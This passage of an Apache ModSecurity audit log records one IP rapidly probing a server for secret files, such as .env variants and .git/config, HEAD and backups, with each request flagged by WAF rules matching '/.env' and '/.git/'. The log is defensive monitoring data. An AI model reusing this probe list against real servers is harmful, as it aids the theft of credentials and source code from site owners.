aFCry5VkCcfT-Z8NQYzEkwAAAAc 185.177.72.204 60032 127.0.0.1 7080 --dccddb21-B-- GET /.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dccddb21-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --dccddb21-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.save"] [unique_id "aFCry5VkCcfT-Z8NQYzEkwAAAAc"] Stopwatch: 1750117323319532 3296 (- - -) Stopwatch2: 1750117323319532 3296; combined=2042, p1=406, p2=1526, p3=21, p4=27, p5=62, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dccddb21-Z-- --525bc027-A-- [17/Jun/2025:05:12:03.433227 +0530] aFCry1CTF37l_jAzt4oSnwAAAAU 185.177.72.204 60038 127.0.0.1 7080 --525bc027-B-- GET /.env.sendgrid HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --525bc027-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --525bc027-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.sendgrid"] [unique_id "aFCry1CTF37l_jAzt4oSnwAAAAU"] Stopwatch: 1750117323429971 3301 (- - -) Stopwatch2: 1750117323429971 3301; combined=2027, p1=374, p2=1552, p3=21, p4=27, p5=53, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --525bc027-Z-- --99202f7b-A-- [17/Jun/2025:05:12:03.543558 +0530] aFCry5WbMc1Q3J_M-mhITAAAAAo 185.177.72.204 60052 127.0.0.1 7080 --99202f7b-B-- GET /.env.smtp HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --99202f7b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --99202f7b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.smtp"] [unique_id "aFCry5WbMc1Q3J_M-mhITAAAAAo"] Stopwatch: 1750117323540416 3186 (- - -) Stopwatch2: 1750117323540416 3186; combined=1950, p1=381, p2=1464, p3=22, p4=27, p5=56, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99202f7b-Z-- --54758b38-A-- [17/Jun/2025:05:12:03.654266 +0530] aFCrywGFf516NUzzD0B3BgAAAAg 185.177.72.204 60068 127.0.0.1 7080 --54758b38-B-- GET /.env.stage HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --54758b38-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --54758b38-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.stage"] [unique_id "aFCrywGFf516NUzzD0B3BgAAAAg"] Stopwatch: 1750117323650892 3420 (- - -) Stopwatch2: 1750117323650892 3420; combined=2067, p1=399, p2=1558, p3=22, p4=28, p5=60, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --54758b38-Z-- --254dd03b-A-- [17/Jun/2025:05:12:03.764573 +0530] aFCry1CTF37l_jAzt4oSoAAAAAU 185.177.72.204 60070 127.0.0.1 7080 --254dd03b-B-- GET /.env.staging.json HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --254dd03b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --254dd03b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.staging.json"] [unique_id "aFCry1CTF37l_jAzt4oSoAAAAAU"] Stopwatch: 1750117323761559 3067 (- - -) Stopwatch2: 1750117323761559 3067; combined=1919, p1=338, p2=1451, p3=28, p4=34, p5=68, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --254dd03b-Z-- --30fdc349-A-- [17/Jun/2025:05:12:03.875418 +0530] aFCrywJ4p5Cdblnjra53jAAAAAI 185.177.72.204 60080 127.0.0.1 7080 --30fdc349-B-- GET /.env.zip HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --30fdc349-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --30fdc349-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.zip"] [unique_id "aFCrywJ4p5Cdblnjra53jAAAAAI"] Stopwatch: 1750117323871958 3503 (- - -) Stopwatch2: 1750117323871958 3503; combined=2035, p1=552, p2=1362, p3=23, p4=29, p5=69, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30fdc349-Z-- --cba5f656-A-- [17/Jun/2025:05:12:03.985993 +0530] aFCry5VkCcfT-Z8NQYzElQAAAAc 185.177.72.204 60082 127.0.0.1 7080 --cba5f656-B-- GET /.env_sample HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cba5f656-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cba5f656-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env_sample"] [unique_id "aFCry5VkCcfT-Z8NQYzElQAAAAc"] Stopwatch: 1750117323982743 3295 (- - -) Stopwatch2: 1750117323982743 3295; combined=1999, p1=422, p2=1475, p3=21, p4=26, p5=55, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cba5f656-Z-- --cd867a40-A-- [17/Jun/2025:05:12:04.096007 +0530] aFCrzFCTF37l_jAzt4oSoQAAAAU 185.177.72.204 60094 127.0.0.1 7080 --cd867a40-B-- GET /.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cd867a40-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd867a40-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env~"] [unique_id "aFCrzFCTF37l_jAzt4oSoQAAAAU"] Stopwatch: 1750117324093465 2584 (- - -) Stopwatch2: 1750117324093465 2584; combined=1580, p1=325, p2=1168, p3=17, p4=22, p5=47, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd867a40-Z-- --8573963f-A-- [17/Jun/2025:05:12:04.316623 +0530] aFCrzJVkCcfT-Z8NQYzElgAAAAc 185.177.72.204 60108 127.0.0.1 7080 --8573963f-B-- GET /.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8573963f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8573963f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/"] [unique_id "aFCrzJVkCcfT-Z8NQYzElgAAAAc"] Stopwatch: 1750117324313589 3078 (- - -) Stopwatch2: 1750117324313589 3078; combined=1876, p1=411, p2=1334, p3=35, p4=47, p5=49, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8573963f-Z-- --f375766d-A-- [17/Jun/2025:05:12:04.427287 +0530] aFCrzOTJOk1gXj_qIh4XlQAAAAQ 185.177.72.204 60114 127.0.0.1 7080 --f375766d-B-- GET /.git/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f375766d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f375766d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/.env"] [unique_id "aFCrzOTJOk1gXj_qIh4XlQAAAAQ"] Stopwatch: 1750117324424077 3255 (- - -) Stopwatch2: 1750117324424077 3255; combined=2026, p1=411, p2=1510, p3=23, p4=28, p5=54, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f375766d-Z-- --3391fc4b-A-- [17/Jun/2025:05:12:04.538678 +0530] aFCrzFJfblPUQiSn5r2RTAAAAAA 185.177.72.204 60130 127.0.0.1 7080 --3391fc4b-B-- GET /.git/COMMIT_EDITMSG HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3391fc4b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3391fc4b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "aFCrzFJfblPUQiSn5r2RTAAAAAA"] Stopwatch: 1750117324534558 4174 (- - -) Stopwatch2: 1750117324534558 4174; combined=2678, p1=498, p2=2034, p3=36, p4=34, p5=76, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3391fc4b-Z-- --2b4afc31-A-- [17/Jun/2025:05:12:04.649198 +0530] aFCrzAGFf516NUzzD0B3CQAAAAg 185.177.72.204 60132 127.0.0.1 7080 --2b4afc31-B-- GET /.git/FETCH_HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2b4afc31-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b4afc31-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/FETCH_HEAD"] [unique_id "aFCrzAGFf516NUzzD0B3CQAAAAg"] Stopwatch: 1750117324645861 3383 (- - -) Stopwatch2: 1750117324645861 3383; combined=2129, p1=393, p2=1630, p3=24, p4=25, p5=56, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b4afc31-Z-- --1fa6651d-A-- [17/Jun/2025:05:12:04.760747 +0530] aFCrzFCTF37l_jAzt4oSowAAAAU 185.177.72.204 60142 127.0.0.1 7080 --1fa6651d-B-- GET /.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1fa6651d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fa6651d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/HEAD"] [unique_id "aFCrzFCTF37l_jAzt4oSowAAAAU"] Stopwatch: 1750117324756771 4039 (- - -) Stopwatch2: 1750117324756771 4039; combined=2495, p1=467, p2=1922, p3=30, p4=29, p5=47, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1fa6651d-Z-- --4709ee7d-A-- [17/Jun/2025:05:12:04.871526 +0530] aFCrzFJfblPUQiSn5r2RTQAAAAA 185.177.72.204 60150 127.0.0.1 7080 --4709ee7d-B-- GET /.git/ORIG_HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4709ee7d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4709ee7d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/ORIG_HEAD"] [unique_id "aFCrzFJfblPUQiSn5r2RTQAAAAA"] Stopwatch: 1750117324868226 3344 (- - -) Stopwatch2: 1750117324868226 3344; combined=1961, p1=398, p2=1468, p3=22, p4=24, p5=49, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4709ee7d-Z-- --336e4608-A-- [17/Jun/2025:05:12:04.982331 +0530] aFCrzJVkCcfT-Z8NQYzEmAAAAAc 185.177.72.204 60160 127.0.0.1 7080 --336e4608-B-- GET /.git/backup HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --336e4608-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --336e4608-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/backup"] [unique_id "aFCrzJVkCcfT-Z8NQYzEmAAAAAc"] Stopwatch: 1750117324979051 3325 (- - -) Stopwatch2: 1750117324979051 3325; combined=2011, p1=414, p2=1480, p3=27, p4=33, p5=57, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --336e4608-Z-- --79fd5008-A-- [17/Jun/2025:05:12:05.093129 +0530] aFCrzVCTF37l_jAzt4oSpAAAAAU 185.177.72.204 60170 127.0.0.1 7080 --79fd5008-B-- GET /.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --79fd5008-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --79fd5008-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config"] [unique_id "aFCrzVCTF37l_jAzt4oSpAAAAAU"] Stopwatch: 1750117325089916 3256 (- - -) Stopwatch2: 1750117325089916 3256; combined=1930, p1=377, p2=1456, p3=24, p4=25, p5=48, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79fd5008-Z-- --11a15931-A-- [17/Jun/2025:05:12:05.204277 +0530] aFCrzVJfblPUQiSn5r2RTgAAAAA 185.177.72.204 60182 127.0.0.1 7080 --11a15931-B-- GET /.git/config.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --11a15931-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --11a15931-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config.bak"] [unique_id "aFCrzVJfblPUQiSn5r2RTgAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.git/config.bak"] [unique_id "aFCrzVJfblPUQiSn5r2RTgAAAAA"] Stopwatch: 1750117325200412 3918 (- - -) Stopwatch2: 1750117325200412 3918; combined=2317, p1=456, p2=1705, p3=24, p4=30, p5=101, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11a15931-Z-- --5348f717-A-- [17/Jun/2025:05:12:05.315602 +0530] aFCrzQGFf516NUzzD0B3CwAAAAg 185.177.72.204 60194 127.0.0.1 7080 --5348f717-B-- GET /.git/config.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5348f717-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5348f717-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line 